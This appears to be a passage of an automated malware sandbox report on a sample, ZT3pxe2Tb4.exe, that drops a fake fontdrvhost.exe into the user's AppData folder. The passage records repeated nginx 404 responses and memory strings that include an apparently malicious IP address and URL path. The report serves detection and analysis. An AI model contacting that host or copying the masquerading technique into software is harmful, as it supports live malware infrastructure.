65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 29 Mar 2024 06:37:32 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 29 Mar 2024 06:37:37 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 29 Mar 2024 06:37:41 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to 
disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 29 Mar 2024 06:37:55 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to 
disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 29 Mar 2024 06:38:03 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to 
disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 29 Mar 2024 06:38:15 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 29 Mar 2024 06:38:30 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 29 Mar 2024 06:38:43 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to 
disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 29 Mar 2024 06:38:55 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to 
disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: fontdrvhost.exe, 00000008.00000002.1704980568.0000000003102000.00000004.00000800.00020000.00000000.sdmp, fontdrvhost.exe, 0000000E.00000002.1796124572.00000000035D7000.00000004.00000800.00020000.00000000.sdmp, fontdrvhost.exe, 00000015.00000002.1883168171.0000000003347000.00000004.00000800.00020000.00000000.sdmp, fontdrvhost.exe, 0000001B.00000002.1932041291.0000000002F11000.00000004.00000800.00020000.00000000.sdmp, fontdrvhost.exe, 00000022.00000002.2017458339.00000000030E0000.00000004.00000800.00020000.00000000.sdmp, fontdrvhost.exe, 00000023.00000002.2120982731.00000000033F7000.00000004.00000800.00020000.00000000.sdmp, fontdrvhost.exe, 0000002A.00000002.2116613612.0000000003855000.00000004.00000800.00020000.00000000.sdmp, fontdrvhost.exe, 00000033.00000002.2490608916.000000000363C000.00000004.00000800.00020000.00000000.sdmp, fontdrvhost.exe, 00000034.00000002.2251980191.0000000002F84000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://89.23.98.225
Source: fontdrvhost.exe, 00000034.00000002.2251980191.0000000002F84000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://89.23.98.225/8pollDbvoiddb/DatalifeFlowerWp/processbaseMariadb1/Defaultbigloadpython/Generato
Source: ZT3pxe2Tb4.exe, 00000000.00000002.1647722543.0000000003A79000.00000004.00000800.00020000.00000000.sdmp, fontdrvhost.exe, 00000008.00000002.1704980568.0000000003102000.00000004.00000800.00020000.00000000.sdmp, fontdrvhost.exe, 0000000E.00000002.1796124572.00000000035D7000.00000004.00000800.00020000.00000000.sdmp, fontdrvhost.exe, 00000015.00000002.1883168171.0000000003347000.00000004.00000800.00020000.00000000.sdmp, fontdrvhost.exe, 0000001B.00000002.1932041291.0000000002F11000.00000004.00000800.00020000.00000000.sdmp, fontdrvhost.exe, 00000022.00000002.2017458339.00000000030E0000.00000004.00000800.00020000.00000000.sdmp, fontdrvhost.exe, 00000023.00000002.2120982731.00000000033F7000.00000004.00000800.00020000.00000000.sdmp, fontdrvhost.exe, 0000002A.00000002.2116613612.0000000003855000.00000004.00000800.00020000.00000000.sdmp, fontdrvhost.exe, 00000033.00000002.2490608916.000000000363C000.00000004.00000800.00020000.00000000.sdmp, fontdrvhost.exe, 00000034.00000002.2251980191.0000000002F84000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Code function: 0_2_00007FFD9BA10DA8 0_2_00007FFD9BA10DA8
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Code function: 0_2_00007FFD9BBD7444 0_2_00007FFD9BBD7444
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Code function: 0_2_00007FFD9BBD7384 0_2_00007FFD9BBD7384
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Code function: 0_2_00007FFD9BBD5A00 0_2_00007FFD9BBD5A00
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Code function: 0_2_00007FFD9BBC09BE 0_2_00007FFD9BBC09BE
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Code function: 0_2_00007FFD9BBD6179 0_2_00007FFD9BBD6179
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Code function: 0_2_00007FFD9BBD4978 0_2_00007FFD9BBD4978
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Code function: 0_2_00007FFD9BBC000A 0_2_00007FFD9BBC000A
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Code function: 0_2_00007FFD9BBD4F51 0_2_00007FFD9BBD4F51
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Code function: 0_2_00007FFD9BBD3600 0_2_00007FFD9BBD3600
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Code function: 0_2_00007FFD9BBD761C 0_2_00007FFD9BBD761C
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Code function: 0_2_00007FFD9BBD55D4 0_2_00007FFD9BBD55D4
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Code function: 0_2_00007FFD9BBD4D31 0_2_00007FFD9BBD4D31
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Code function: 0_2_00007FFD9BBD4D12 0_2_00007FFD9BBD4D12
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Code function: 0_2_00007FFD9BBD4CA1 0_2_00007FFD9BBD4CA1
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Code function: 0_2_00007FFD9BBD6C80 0_2_00007FFD9BBD6C80
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Code function: 0_2_00007FFD9C0F78B0 0_2_00007FFD9C0F78B0
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 8_2_00007FFD9B9F0DA8 8_2_00007FFD9B9F0DA8
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 8_2_00007FFD9BBB4BF2 8_2_00007FFD9BBB4BF2
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 8_2_00007FFD9BBB5A00 8_2_00007FFD9BBB5A00
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 8_2_00007FFD9BBA09BE 8_2_00007FFD9BBA09BE
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 8_2_00007FFD9BBB4978 8_2_00007FFD9BBB4978
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 8_2_00007FFD9BBA000A 8_2_00007FFD9BBA000A
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 8_2_00007FFD9BBB5E82 8_2_00007FFD9BBB5E82
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 8_2_00007FFD9BBB3600 8_2_00007FFD9BBB3600
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 8_2_00007FFD9BBB55D3 8_2_00007FFD9BBB55D3
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 8_2_00007FFD9BBB6590 8_2_00007FFD9BBB6590
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 8_2_00007FFD9BBB34F3 8_2_00007FFD9BBB34F3
